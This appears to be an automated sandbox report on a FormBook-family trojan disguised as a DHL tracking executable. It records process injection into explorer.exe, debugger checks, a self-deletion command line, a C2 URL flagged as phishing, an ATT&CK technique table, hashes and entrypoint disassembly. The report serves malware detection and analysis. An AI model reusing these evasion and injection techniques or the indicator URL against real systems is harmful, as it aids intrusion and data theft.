          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033EE539 mov eax, dword ptr fs:[00000030h]11_2_033EE539
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F8D34 mov eax, dword ptr fs:[00000030h]11_2_033F8D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033AA537 mov eax, dword ptr fs:[00000030h]11_2_033AA537
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03354D3B mov eax, dword ptr fs:[00000030h]11_2_03354D3B
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_0040ACF0 LdrLoadDll

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: FA0000
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: unknown protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Memory written: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Thread register set: target process: 3440
          Source: C:\Windows\SysWOW64\wlanext.exe Thread register set: target process: 3440
          Source: C:\Windows\SysWOW64\wlanext.exe Thread register set: target process: 4636
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Process created: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe"
          Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe"
          Source: explorer.exe, 00000004.00000000.400933847.0000000004F80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.372434615.00000000083EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.379442047.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.406682717.00000000083EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.366258257.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.391671803.00000000083EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.398942795.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.398387239.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.365948444.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.379442047.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.378992987.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.366258257.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.398942795.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.569698157.0000000005680000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.601472852.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.609013928.0000000005680000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.562272116.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.538860385.0000000005680000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.379442047.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.366258257.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.398942795.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: &Program Manager
          Source: explorer.exe, 00000004.00000000.379442047.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.366258257.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.398942795.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000014.00000000.603455559.0000000004560000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.563664219.0000000004560000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progmanng
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 0_2_00405AA7 GetVersion, GetSystemDirectoryA, GetWindowsDirectoryA, SHGetSpecialFolderLocation, SHGetPathFromIDListA, CoTaskMemFree, lstrcatA, lstrlenA

          Stealing of Sensitive Information

          Source: Yara match File source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.635990166.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000000.360270037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000000.409581872.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.362630153.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.436793150.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000000.394582472.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.436005605.00000000009A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match File source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.635990166.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000000.360270037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000000.409581872.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.362630153.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.436793150.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000000.394582472.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.436005605.00000000009A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
          |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
          | Valid Accounts | 11 Native API | Path Interception | 512 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Query Registry | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot |
          | Default Accounts | 1 Shared Modules | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 2 Virtualization/Sandbox Evasion | LSASS Memory | 231 Security Software Discovery | Remote Desktop Protocol | 1 Clipboard Data | Exfiltration Over Bluetooth | 1 Non-Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
          | Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 512 Process Injection | Security Account Manager | 2 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 11 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
          | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Deobfuscate/Decode Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud |
          | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
          | Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Software Packing | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
          | External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 File Deletion | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |

          [Behavior graph (image not preserved). Behavior Graph ID: 562043, Sample: DHL AWB TRACKING DETAILS.exe, Startdate: 28/01/2022, Architecture: WINDOWS, Score: 100]

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | DHL AWB TRACKING DETAILS.exe | 43% | Virustotal | |
          | DHL AWB TRACKING DETAILS.exe | 9% | Metadefender | |
          | DHL AWB TRACKING DETAILS.exe | 49% | ReversingLabs | Win32.Trojan.FormBook |
          | DHL AWB TRACKING DETAILS.exe | 100% | Joe Sandbox ML | |

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp\vzhghptrhu.dll | 37% | Virustotal | |
          | C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp\vzhghptrhu.dll | 26% | ReversingLabs | Win32.Trojan.InjectorX |

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 31.2.explorer.exe.f07f840.1.unpack | 100% | Avira | TR/Patched.Ren.Gen |
          | 20.0.explorer.exe.ad0f840.6.unpack | 100% | Avira | TR/Patched.Ren.Gen |
          | 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 1.0.DHL AWB TRACKING DETAILS.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 11.2.wlanext.exe.382f840.4.unpack | 100% | Avira | TR/Patched.Ren.Gen |
          | 11.2.wlanext.exe.deef30.0.unpack | 100% | Avira | TR/Patched.Ren.Gen |
          | 20.0.explorer.exe.ad0f840.3.unpack | 100% | Avira | TR/Patched.Ren.Gen |
          | 20.0.explorer.exe.ad0f840.0.unpack | 100% | Avira | TR/Patched.Ren.Gen |

          No Antivirus matches

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | www.hdetpnipa.xyz/a34b/ | 10% | Virustotal | |
          | www.hdetpnipa.xyz/a34b/ | 100% | Avira URL Cloud | phishing |
          | http://crl.v | 0% | URL Reputation | safe |

          | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
          |---|---|---|---|---|---|
          | www.chinaanalysisgroup.com | 94.136.40.51 | true | false | | unknown |

          | Name | Malicious | Antivirus Detection | Reputation |
          |---|---|---|---|
          | www.hdetpnipa.xyz/a34b/ | true | 10%, Virustotal; Avira URL Cloud: phishing | low |

          | Name | Source | Malicious | Antivirus Detection | Reputation |
          |---|---|---|---|---|
          | http://www.autoitscript.com/autoit3/J | explorer.exe, 00000004.00000000.379142678.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.366064196.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.398584347.000000000095C000.00000004.00000020.00020000.00000000.sdmp | false | | high |
          | http://nsis.sf.net/NSIS_Error | DHL AWB TRACKING DETAILS.exe, DHL AWB TRACKING DETAILS.exe, 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp, DHL AWB TRACKING DETAILS.exe, 00000000.00000000.352121005.0000000000409000.00000008.00000001.01000000.00000003.sdmp, DHL AWB TRACKING DETAILS.exe, 00000001.00000000.355752258.0000000000409000.00000008.00000001.01000000.00000003.sdmp | false | | high |
          | http://nsis.sf.net/NSIS_ErrorError | DHL AWB TRACKING DETAILS.exe, 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp, DHL AWB TRACKING DETAILS.exe, 00000000.00000000.352121005.0000000000409000.00000008.00000001.01000000.00000003.sdmp, DHL AWB TRACKING DETAILS.exe, 00000001.00000000.355752258.0000000000409000.00000008.00000001.01000000.00000003.sdmp | false | | high |
          | http://crl.v | explorer.exe, 00000014.00000003.556038613.0000000004F3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.553294057.0000000004F3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.566295637.0000000004F3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.578401411.0000000004F3A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |

          No contacted IP infos

                  Joe Sandbox Version: 34.0.0 Boulder Opal
                  Analysis ID: 562043
                  Start date: 28.01.2022
                  Start time: 10:53:30
                  Joe Sandbox Product: CloudBasic
                  Overall analysis duration: 0h 11m 57s
                  Hypervisor based Inspection enabled: false
                  Report type: full
                  Sample file name: DHL AWB TRACKING DETAILS.exe
                  Cookbook file name: default.jbs
                  Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed: 32
                  Number of new started drivers analysed: 0
                  Number of existing processes analysed: 0
                  Number of existing drivers analysed: 0
                  Number of injected processes analysed: 1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode: default
                  Analysis stop reason: Timeout
                  Detection: MAL
                  Classification: mal100.troj.evad.winEXE@9/4@1/0
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 60.3% (good quality ratio 55.5%)
                  • Quality average: 73.6%
                  • Quality standard deviation: 30.6%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 98
                  • Number of non-executed functions: 63
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SearchUI.exe, backgroundTaskHost.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, conhost.exe, svchost.exe, mobsync.exe, wuapihost.exe
                  • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtEnumerateValueKey calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  Time | Type | Description
                  10:55:45 | API Interceptor | 145x Sleep call for process: explorer.exe modified
                  No context
                  Process:C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):216745
                  Entropy (8bit):7.992452492387805
                  Encrypted:true
                  SSDEEP:6144:i7Bqt/rlMOOtvd7vIeYMD0dNT+V/w1Vc5S:Oqt/rlMOURXYMAdl+VI1wS
                  MD5:D711B91073A1EF5C228C8C73240F3385
                  SHA1:E032D0778986830C322964AEBFB8E870BC7F2ADC
                  SHA-256:A445B0B8F8A9D002C4196DB12F455ACBA30FDF9A59679227B414E478450C8620
                  SHA-512:9246B31146551D240878F47592074E9C26F022B4ADDF89FE11B1CD4F1AF30EE991C0E8D42FA5B7C610C748553B7D52626105C7BD56EF7E01BD9B33B717270156
                  Malicious:false
                  Reputation:low
                  Process:C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):268956
                  Entropy (8bit):7.643688780936791
                  Encrypted:false
                  SSDEEP:6144:u57Bqt/rlMOOtvd7vIeYMD0dNT+V/w1Vc5i:yqt/rlMOURXYMAdl+VI1w
                  MD5:5671EF7FB29C27877E71184714A1C0F6
                  SHA1:3CE9961EC8B7F820E58AF0EA56ABEA8DB18F2E1C
                  SHA-256:D3DA5949B1EA253A18E0B684EC6EE1B355E9FA0C3B81C847119602D6AFBE459A
                  SHA-512:6C835BFAAA83F01BF276BA42ADDDC8AE3C6F0C43C059A6AA713F5D382E8FC5115A09FEDD98F29A95FA7615CF15CD58475ED1DC321F410CECC4B38EDA5D2544F3
                  Malicious:false
                  Reputation:low
                  Process:C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe
                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):17920
                  Entropy (8bit):5.732490075773449
                  Encrypted:false
                  SSDEEP:384:45EhhSL3A0xOfQy1zCsF0oavew2PFVP6zx22Y0We4omL/:4+hSLwWOIy1Wtoa2wNQo
                  MD5:D2B96D84DF88876D02820CA05C8254E2
                  SHA1:66C575874197ACE26E2D77C408154891C1C2A464
                  SHA-256:AC4F4FC273432D090B87CC740B2668BB105AEA12D35B9F48BE82885607172708
                  SHA-512:123B2255F5598BC7D51872CB2E0CBA58367B22AD638DF786AAEFA4CFDDDA11A0DAEC36002559CD9A2BDCD74CC78F903642595E0438FDD82681A938B9CB1B97F1
                  Malicious:true
                  Antivirus:
                  • Antivirus: Virustotal, Detection: 37%, Browse
                  • Antivirus: ReversingLabs, Detection: 26%
                  Reputation:low
                  Process:C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):5254
                  Entropy (8bit):6.083971719042361
                  Encrypted:false
                  SSDEEP:96:0MhH9rpQHfV685JLXeDCjxxB6qoX+hmKQuKFvIVyOF7SCWO2z5lOfdHM+KQ0yBdq:0Gw6YL3xxItn62z3wHM0fwvT
                  MD5:CF29025B5A29863F95888CC5EAE59F80
                  SHA1:707E98B72D945FBB32D5A9CA282FF74A117FF648
                  SHA-256:C7333C69C05C4BF3D325ADA4EFBB8F1641108B21211BA729F90DA95923867955
                  SHA-512:DB5E6E866077CB8DC597BF2E033A2DE3D46DDAFD0E82E2956E2840A757902F66A36A87830214E6D77668BF53F53FF08AAD62A7234AD84E5148B30BB7969BA45F
                  Malicious:false
                  Reputation:low
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                  Entropy (8bit):7.929574935862176
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 92.16%
                  • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:DHL AWB TRACKING DETAILS.exe
                  File size:254216
                  MD5:4e358b432ba956c13627beee054d68e5
                  SHA1:8791318da047e93f2a16cc6535eba5159228f832
                  SHA256:836696cddebff5d522acb2c105a404ceeb635df69b3c9544b5bebcef13bc3e86
                  SHA512:a251f2f3e4fe9b0b44b3537983b406e9eb2d5e22298129ba9548f626c3657410adf23b50d0dd69f4601d7c873056e545ca7be0d808f8f0db3f9a38609b82dcff
                  SSDEEP:6144:ownv8jZAg8ZjqsPExIRaX+kK9WPvCH+tIvz:D8jZUVRaukK9kvCH+aL
                  Icon Hash:b2a88c96b2ca6a72
                  Entrypoint:0x403225
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  DLL Characteristics:
                  Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:099c0646ea7282d232219f8807883be0
                  Instruction
                  sub esp, 00000180h
                  push ebx
                  push ebp
                  push esi
                  xor ebx, ebx
                  push edi
                  mov dword ptr [esp+18h], ebx
                  mov dword ptr [esp+10h], 00409128h
                  xor esi, esi
                  mov byte ptr [esp+14h], 00000020h
                  call dword ptr [00407030h]
                  push 00008001h
                  call dword ptr [004070B4h]
                  push ebx
                  call dword ptr [0040727Ch]
                  push 00000008h
                  mov dword ptr [00423F58h], eax
                  call 00007F42389B1E60h
                  mov dword ptr [00423EA4h], eax
                  push ebx
                  lea eax, dword ptr [esp+34h]
                  push 00000160h
                  push eax
                  push ebx
                  push 0041F450h
                  call dword ptr [00407158h]
                  push 004091B0h
                  push 004236A0h
                  call 00007F42389B1B17h
                  call dword ptr [004070B0h]
                  mov edi, 00429000h
                  push eax
                  push edi
                  call 00007F42389B1B05h
                  push ebx
                  call dword ptr [0040710Ch]
                  cmp byte ptr [00429000h], 00000022h
                  mov dword ptr [00423EA0h], eax
                  mov eax, edi
                  jne 00007F42389AF32Ch
                  mov byte ptr [esp+14h], 00000022h
                  mov eax, 00429001h
                  push dword ptr [esp+14h]
                  push eax
                  call 00007F42389B15F8h
                  push eax
                  call dword ptr [0040721Ch]
                  mov dword ptr [esp+1Ch], eax
                  jmp 00007F42389AF385h
                  cmp cl, 00000020h
                  jne 00007F42389AF328h
                  inc eax
                  cmp byte ptr [eax], 00000020h
                  je 00007F42389AF31Ch
                  cmp byte ptr [eax], 00000022h
                  mov byte ptr [eax+eax+00h], 00000000h
                  Programming Language:
                  • [EXP] VC++ 6.0 SP5 build 8804
                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c000 | 0x900 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  .text | 0x1000 | 0x5976 | 0x5a00 | False | 0.668619791667 | data | 6.46680044621 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
